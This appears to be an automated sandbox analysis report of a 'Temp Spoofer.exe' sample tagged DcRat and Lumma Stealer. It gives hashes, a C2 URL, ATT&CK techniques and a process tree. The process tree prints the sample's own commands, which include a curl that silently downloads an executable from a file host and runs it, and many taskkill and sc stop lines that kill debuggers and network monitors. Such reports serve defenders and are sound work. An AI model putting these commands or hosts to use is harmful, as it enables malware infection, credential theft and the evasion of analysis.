dcrat | 1a56f55639b39aff74ad6e5199f0a43e7e286bc50e51cd0f44fc17dc58e44cbb

Analysis

max time kernel
95s
max time network
143s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
23-11-2024 01:45

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Temp Spoofer.exe
Size

80KB
MD5

b78426b5a12e41584e38e488cc222060
SHA1

8785d4f2d3ed6f230a00ecfbfdba9e41005dbe93
SHA256

1a56f55639b39aff74ad6e5199f0a43e7e286bc50e51cd0f44fc17dc58e44cbb
SHA512

587e00c6a777c19c457691d75ffd91b0cdc0ef675e4027e4307e4e868e2a26652d6037a3867432ce9e50d45c0c4c9615b80704d43676425fd840693d4d9c0c5f
SSDEEP

1536:t9o7JhgQHS6kEl/isGDz006OzhaK62LXlWm5SescQvgjVT2ZHW:/o1uGl/isGX06hhWm5Bscn2

Score

10^/10

dcrat lumma discovery evasion execution infostealer rat spyware stealer

Malware Config

Extracted

Family

lumma

https://fumblingactor.cyou/api

Signatures

DcRat
DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.
rat infostealer dcrat
Dcrat family
dcrat
Lumma Stealer, LummaC
Lumma or LummaC is an infostealer written in C++ first seen in August 2022.
stealer lumma
Lumma family
lumma

Process spawned unexpected child process 18 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exe

description	pid	pid_target	process
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1768	4556	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2296	4556	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2772	4556	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4868	4556	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	796	4556	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2832	4556	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1228	4556	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	432	4556	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2260	4556	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2940	4556	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4672	4556	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1392	4556	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1412	4556	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1440	4556	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	116	4556	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1640	4556	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1384	4556	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2868	4556	schtasks.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
execution

PowerShell
T1059.001

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid process

3268 powershell.exe
1224 powershell.exe
1596 powershell.exe
3752 powershell.exe
920 powershell.exe
1560 powershell.exe
Downloads MZ/PE file
Stops running service(s) 4 TTPs
evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002

pid	process
3268	powershell.exe
1224	powershell.exe
1596	powershell.exe
3752	powershell.exe
920	powershell.exe
1560	powershell.exe

Checks computer location settings 2 TTPs 4 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

physmeme.exeWScript.exeMedal.exeTemp Spoofer.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation	physmeme.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation	Medal.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation	Temp Spoofer.exe

Executes dropped EXE 3 IoCs

Processes:

physmeme.exephysmeme.exeMedal.exe

pid process

2380 physmeme.exe
3724 physmeme.exe
412 Medal.exe
Loads dropped DLL 1 IoCs

Processes:

physmeme.exe

pid process

2380 physmeme.exe
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003

pid	process
2380	physmeme.exe
3724	physmeme.exe
412	Medal.exe

pid	process
2380	physmeme.exe

Drops file in System32 directory 4 IoCs

Processes:

curl.execurl.execurl.execurl.exe

description	ioc	process
File created	C:\Windows\System32\Tasks\clean1.bat	curl.exe
File created	C:\Windows\System32\Tasks\clean2.bat	curl.exe
File created	C:\Windows\System32\Tasks\clean3.bat	curl.exe
File created	C:\Windows\System32\Tasks\clean4.bat	curl.exe

Suspicious use of SetThreadContext 1 IoCs

Processes:

physmeme.exe

description pid process target process

PID 2380 set thread context of 4536 2380 physmeme.exe aspnet_regiis.exe

description	pid	process	target process
PID 2380 set thread context of 4536	2380	physmeme.exe	aspnet_regiis.exe

Drops file in Program Files directory 3 IoCs

Processes:

Medal.exe

description	ioc	process
File created	C:\Program Files\Windows Defender\taskhostw.exe	Medal.exe
File opened for modification	C:\Program Files\Windows Defender\taskhostw.exe	Medal.exe
File created	C:\Program Files\Windows Defender\ea9f0e6c9e2dcd	Medal.exe

Drops file in Windows directory 4 IoCs

Processes:

curl.execurl.exeMedal.exe

description	ioc	process
File created	C:\Windows\Speech\physmeme.exe	curl.exe
File opened for modification	C:\Windows\Speech\physmeme.exe	curl.exe
File created	C:\Windows\uk-UA\fontdrvhost.exe	Medal.exe
File created	C:\Windows\uk-UA\5b884080fd4f94	Medal.exe

Launches sc.exe 14 IoCs

Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exe

pid	process
2084	sc.exe
5016	sc.exe
1560	sc.exe
1228	sc.exe
2400	sc.exe
4720	sc.exe
2200	sc.exe
4240	sc.exe
4488	sc.exe
3000	sc.exe
4920	sc.exe
2504	sc.exe
4816	sc.exe
2940	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Program crash 1 IoCs

Processes:

WerFault.exe

pid pid_target process target process

4000 2380 WerFault.exe physmeme.exe

pid	pid_target	process	target process
4000	2380	WerFault.exe	physmeme.exe

System Location Discovery: System Language Discovery 1 TTPs 5 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

Processes:

physmeme.exeaspnet_regiis.exephysmeme.exeWScript.execmd.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	physmeme.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	aspnet_regiis.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	physmeme.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 1 IoCs
Adversaries may check for Internet connectivity on compromised systems.
discovery

Internet Connection Discovery
T1016.001

Processes:

PING.EXE

pid process

4052 PING.EXE

pid	process
4052	PING.EXE

Kills process with taskkill 26 IoCs

evasion

Processes:

taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exe

pid	process
2392	taskkill.exe
4948	taskkill.exe
4452	taskkill.exe
2268	taskkill.exe
2468	taskkill.exe
956	taskkill.exe
2504	taskkill.exe
3168	taskkill.exe
2460	taskkill.exe
4476	taskkill.exe
2256	taskkill.exe
3956	taskkill.exe
1916	taskkill.exe
3436	taskkill.exe
2596	taskkill.exe
3584	taskkill.exe
4128	taskkill.exe
3180	taskkill.exe
4676	taskkill.exe
5112	taskkill.exe
1040	taskkill.exe
1968	taskkill.exe
3076	taskkill.exe
1124	taskkill.exe
1112	taskkill.exe
1996	taskkill.exe

Modifies registry class 2 IoCs

Processes:

Medal.exephysmeme.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000_Classes\Local Settings	Medal.exe
Key created	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000_Classes\Local Settings	physmeme.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery
T1018

Processes:

PING.EXE

pid process

4052 PING.EXE

pid	process
4052	PING.EXE

Scheduled Task/Job: Scheduled Task 1 TTPs 18 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

Processes:

pid	process
4672	schtasks.exe
1412	schtasks.exe
2868	schtasks.exe
2832	schtasks.exe
2940	schtasks.exe
1228	schtasks.exe
116	schtasks.exe
1384	schtasks.exe
1768	schtasks.exe
2772	schtasks.exe
1640	schtasks.exe
2296	schtasks.exe
2260	schtasks.exe
432	schtasks.exe
1392	schtasks.exe
1440	schtasks.exe
4868	schtasks.exe
796	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

Temp Spoofer.exe

pid	process
1556	Temp Spoofer.exe
1556	Temp Spoofer.exe
1556	Temp Spoofer.exe
1556	Temp Spoofer.exe
1556	Temp Spoofer.exe
1556	Temp Spoofer.exe
1556	Temp Spoofer.exe
1556	Temp Spoofer.exe
1556	Temp Spoofer.exe
1556	Temp Spoofer.exe
1556	Temp Spoofer.exe
1556	Temp Spoofer.exe
1556	Temp Spoofer.exe
1556	Temp Spoofer.exe
1556	Temp Spoofer.exe
1556	Temp Spoofer.exe
1556	Temp Spoofer.exe
1556	Temp Spoofer.exe
1556	Temp Spoofer.exe
1556	Temp Spoofer.exe
1556	Temp Spoofer.exe
1556	Temp Spoofer.exe
1556	Temp Spoofer.exe
1556	Temp Spoofer.exe
1556	Temp Spoofer.exe
1556	Temp Spoofer.exe
1556	Temp Spoofer.exe
1556	Temp Spoofer.exe
1556	Temp Spoofer.exe
1556	Temp Spoofer.exe
1556	Temp Spoofer.exe
1556	Temp Spoofer.exe
1556	Temp Spoofer.exe
1556	Temp Spoofer.exe
1556	Temp Spoofer.exe
1556	Temp Spoofer.exe
1556	Temp Spoofer.exe
1556	Temp Spoofer.exe
1556	Temp Spoofer.exe
1556	Temp Spoofer.exe
1556	Temp Spoofer.exe
1556	Temp Spoofer.exe
1556	Temp Spoofer.exe
1556	Temp Spoofer.exe
1556	Temp Spoofer.exe
1556	Temp Spoofer.exe
1556	Temp Spoofer.exe
1556	Temp Spoofer.exe
1556	Temp Spoofer.exe
1556	Temp Spoofer.exe
1556	Temp Spoofer.exe
1556	Temp Spoofer.exe
1556	Temp Spoofer.exe
1556	Temp Spoofer.exe
1556	Temp Spoofer.exe
1556	Temp Spoofer.exe
1556	Temp Spoofer.exe
1556	Temp Spoofer.exe
1556	Temp Spoofer.exe
1556	Temp Spoofer.exe
1556	Temp Spoofer.exe
1556	Temp Spoofer.exe
1556	Temp Spoofer.exe
1556	Temp Spoofer.exe

Suspicious use of AdjustPrivilegeToken 33 IoCs

Processes:

description	pid	process
Token: SeDebugPrivilege	1916	taskkill.exe
Token: SeDebugPrivilege	1112	taskkill.exe
Token: SeDebugPrivilege	1996	taskkill.exe
Token: SeDebugPrivilege	3436	taskkill.exe
Token: SeDebugPrivilege	3168	taskkill.exe
Token: SeDebugPrivilege	5112	taskkill.exe
Token: SeDebugPrivilege	956	taskkill.exe
Token: SeDebugPrivilege	2504	taskkill.exe
Token: SeDebugPrivilege	3180	taskkill.exe
Token: SeDebugPrivilege	2460	taskkill.exe
Token: SeDebugPrivilege	2392	taskkill.exe
Token: SeDebugPrivilege	4476	taskkill.exe
Token: SeDebugPrivilege	2256	taskkill.exe
Token: SeDebugPrivilege	1040	taskkill.exe
Token: SeDebugPrivilege	3956	taskkill.exe
Token: SeDebugPrivilege	4948	taskkill.exe
Token: SeDebugPrivilege	4676	taskkill.exe
Token: SeDebugPrivilege	1968	taskkill.exe
Token: SeDebugPrivilege	4452	taskkill.exe
Token: SeDebugPrivilege	3076	taskkill.exe
Token: SeDebugPrivilege	2596	taskkill.exe
Token: SeDebugPrivilege	3584	taskkill.exe
Token: SeDebugPrivilege	2268	taskkill.exe
Token: SeDebugPrivilege	2468	taskkill.exe
Token: SeDebugPrivilege	1124	taskkill.exe
Token: SeDebugPrivilege	4128	taskkill.exe
Token: SeDebugPrivilege	412	Medal.exe
Token: SeDebugPrivilege	3268	powershell.exe
Token: SeDebugPrivilege	1224	powershell.exe
Token: SeDebugPrivilege	920	powershell.exe
Token: SeDebugPrivilege	1596	powershell.exe
Token: SeDebugPrivilege	3752	powershell.exe
Token: SeDebugPrivilege	1560	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

Temp Spoofer.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.exe

description	pid	process	target process
PID 1556 wrote to memory of 4624	1556	Temp Spoofer.exe	cmd.exe
PID 1556 wrote to memory of 4624	1556	Temp Spoofer.exe	cmd.exe
PID 1556 wrote to memory of 4512	1556	Temp Spoofer.exe	cmd.exe
PID 1556 wrote to memory of 4512	1556	Temp Spoofer.exe	cmd.exe
PID 4512 wrote to memory of 4432	4512	cmd.exe	curl.exe
PID 4512 wrote to memory of 4432	4512	cmd.exe	curl.exe
PID 4624 wrote to memory of 1916	4624	cmd.exe	taskkill.exe
PID 4624 wrote to memory of 1916	4624	cmd.exe	taskkill.exe
PID 1556 wrote to memory of 4224	1556	Temp Spoofer.exe	cmd.exe
PID 1556 wrote to memory of 4224	1556	Temp Spoofer.exe	cmd.exe
PID 4224 wrote to memory of 1112	4224	cmd.exe	taskkill.exe
PID 4224 wrote to memory of 1112	4224	cmd.exe	taskkill.exe
PID 1556 wrote to memory of 3584	1556	Temp Spoofer.exe	cmd.exe
PID 1556 wrote to memory of 3584	1556	Temp Spoofer.exe	cmd.exe
PID 3584 wrote to memory of 4488	3584	cmd.exe	sc.exe
PID 3584 wrote to memory of 4488	3584	cmd.exe	sc.exe
PID 1556 wrote to memory of 3796	1556	Temp Spoofer.exe	cmd.exe
PID 1556 wrote to memory of 3796	1556	Temp Spoofer.exe	cmd.exe
PID 3796 wrote to memory of 1996	3796	cmd.exe	taskkill.exe
PID 3796 wrote to memory of 1996	3796	cmd.exe	taskkill.exe
PID 1556 wrote to memory of 780	1556	Temp Spoofer.exe	cmd.exe
PID 1556 wrote to memory of 780	1556	Temp Spoofer.exe	cmd.exe
PID 780 wrote to memory of 3436	780	cmd.exe	taskkill.exe
PID 780 wrote to memory of 3436	780	cmd.exe	taskkill.exe
PID 1556 wrote to memory of 688	1556	Temp Spoofer.exe	cmd.exe
PID 1556 wrote to memory of 688	1556	Temp Spoofer.exe	cmd.exe
PID 688 wrote to memory of 3168	688	cmd.exe	taskkill.exe
PID 688 wrote to memory of 3168	688	cmd.exe	taskkill.exe
PID 1556 wrote to memory of 5088	1556	Temp Spoofer.exe	cmd.exe
PID 1556 wrote to memory of 5088	1556	Temp Spoofer.exe	cmd.exe
PID 5088 wrote to memory of 5112	5088	cmd.exe	taskkill.exe
PID 5088 wrote to memory of 5112	5088	cmd.exe	taskkill.exe
PID 1556 wrote to memory of 4560	1556	Temp Spoofer.exe	cmd.exe
PID 1556 wrote to memory of 4560	1556	Temp Spoofer.exe	cmd.exe
PID 4560 wrote to memory of 956	4560	cmd.exe	taskkill.exe
PID 4560 wrote to memory of 956	4560	cmd.exe	taskkill.exe
PID 1556 wrote to memory of 4664	1556	Temp Spoofer.exe	cmd.exe
PID 1556 wrote to memory of 4664	1556	Temp Spoofer.exe	cmd.exe
PID 4664 wrote to memory of 2504	4664	cmd.exe	taskkill.exe
PID 4664 wrote to memory of 2504	4664	cmd.exe	taskkill.exe
PID 1556 wrote to memory of 5080	1556	Temp Spoofer.exe	cmd.exe
PID 1556 wrote to memory of 5080	1556	Temp Spoofer.exe	cmd.exe
PID 5080 wrote to memory of 3180	5080	cmd.exe	taskkill.exe
PID 5080 wrote to memory of 3180	5080	cmd.exe	taskkill.exe
PID 1556 wrote to memory of 2064	1556	Temp Spoofer.exe	cmd.exe
PID 1556 wrote to memory of 2064	1556	Temp Spoofer.exe	cmd.exe
PID 2064 wrote to memory of 2460	2064	cmd.exe	taskkill.exe
PID 2064 wrote to memory of 2460	2064	cmd.exe	taskkill.exe
PID 1556 wrote to memory of 548	1556	Temp Spoofer.exe	cmd.exe
PID 1556 wrote to memory of 548	1556	Temp Spoofer.exe	cmd.exe
PID 548 wrote to memory of 2392	548	cmd.exe	taskkill.exe
PID 548 wrote to memory of 2392	548	cmd.exe	taskkill.exe
PID 1556 wrote to memory of 3548	1556	Temp Spoofer.exe	cmd.exe
PID 1556 wrote to memory of 3548	1556	Temp Spoofer.exe	cmd.exe
PID 3548 wrote to memory of 4476	3548	cmd.exe	taskkill.exe
PID 3548 wrote to memory of 4476	3548	cmd.exe	taskkill.exe
PID 1556 wrote to memory of 1904	1556	Temp Spoofer.exe	cmd.exe
PID 1556 wrote to memory of 1904	1556	Temp Spoofer.exe	cmd.exe
PID 1904 wrote to memory of 2256	1904	cmd.exe	taskkill.exe
PID 1904 wrote to memory of 2256	1904	cmd.exe	taskkill.exe
PID 1556 wrote to memory of 2424	1556	Temp Spoofer.exe	cmd.exe
PID 1556 wrote to memory of 2424	1556	Temp Spoofer.exe	cmd.exe
PID 2424 wrote to memory of 3000	2424	cmd.exe	sc.exe
PID 2424 wrote to memory of 3000	2424	cmd.exe	sc.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\Temp Spoofer.exe
"C:\Users\Admin\AppData\Local\Temp\Temp Spoofer.exe"
1⤵
- Checks computer location settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1556
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerUI.exe >nul 2>&1
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4624
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im HTTPDebuggerUI.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:1916
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c curl --silent https://files.catbox.moe/sx1s7p.bin --output C:\Windows\Speech\physmeme.exe
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4512
- - C:\Windows\system32\curl.exe
    curl --silent https://files.catbox.moe/sx1s7p.bin --output C:\Windows\Speech\physmeme.exe
    3⤵
    - Drops file in Windows directory
    PID:4432
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerSvc.exe >nul 2>&1
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4224
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im HTTPDebuggerSvc.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:1112
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c sc stop HTTPDebuggerPro >nul 2>&1
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3584
- - C:\Windows\system32\sc.exe
    sc stop HTTPDebuggerPro
    3⤵
    - Launches sc.exe
    PID:4488
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T >nul 2>&1
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3796
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:1996
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&1
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:780
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:3436
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T >nul 2>&1
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:688
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:3168
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq fiddler*" /IM * /F /T >nul 2>&1
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:5088
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq fiddler*" /IM * /F /T
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:5112
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq wireshark*" /IM * /F /T >nul 2>&1
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4560
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq wireshark*" /IM * /F /T
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:956
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq rawshark*" /IM * /F /T >nul 2>&1
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4664
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq rawshark*" /IM * /F /T
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:2504
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq charles*" /IM * /F /T >nul 2>&1
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:5080
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq charles*" /IM * /F /T
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:3180
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T >nul 2>&1
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2064
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:2460
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq ida*" /IM * /F /T >nul 2>&1
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:548
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq ida*" /IM * /F /T
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:2392
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&1
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3548
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:4476
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T >nul 2>&1
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1904
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:2256
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c sc stop HTTPDebuggerPro >nul 2>&1
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2424
- - C:\Windows\system32\sc.exe
    sc stop HTTPDebuggerPro
    3⤵
    - Launches sc.exe
    PID:3000
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c sc stop KProcessHacker3 >nul 2>&1
  2⤵
  PID:4020
- - C:\Windows\system32\sc.exe
    sc stop KProcessHacker3
    3⤵
    - Launches sc.exe
    PID:4720
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c sc stop KProcessHacker2 >nul 2>&1
  2⤵
  PID:1284
- - C:\Windows\system32\sc.exe
    sc stop KProcessHacker2
    3⤵
    - Launches sc.exe
    PID:2084
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c sc stop KProcessHacker1 >nul 2>&1
  2⤵
  PID:3792
- - C:\Windows\system32\sc.exe
    sc stop KProcessHacker1
    3⤵
    - Launches sc.exe
    PID:5016
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c sc stop wireshark >nul 2>&1
  2⤵
  PID:4052
- - C:\Windows\system32\sc.exe
    sc stop wireshark
    3⤵
    - Launches sc.exe
    PID:4920
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c sc stop npf >nul 2>&1
  2⤵
  PID:3728
- - C:\Windows\system32\sc.exe
    sc stop npf
    3⤵
    - Launches sc.exe
    PID:1560
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerUI.exe >nul 2>&1
  2⤵
  PID:3196
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im HTTPDebuggerUI.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:1040
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerSvc.exe >nul 2>&1
  2⤵
  PID:4936
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im HTTPDebuggerSvc.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:3956
- C:\Windows\Speech\physmeme.exe
  "C:\Windows\Speech\physmeme.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Suspicious use of SetThreadContext
  - System Location Discovery: System Language Discovery
  PID:2380
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4536
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 2380 -s 1016
    3⤵
    - Program crash
    PID:4000
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c sc stop HTTPDebuggerPro >nul 2>&1
  2⤵
  PID:4988
- - C:\Windows\system32\sc.exe
    sc stop HTTPDebuggerPro
    3⤵
    - Launches sc.exe
    PID:2200
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T >nul 2>&1
  2⤵
  PID:4532
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:4948
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&1
  2⤵
  PID:4100
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:4676
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T >nul 2>&1
  2⤵
  PID:4444
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:1968
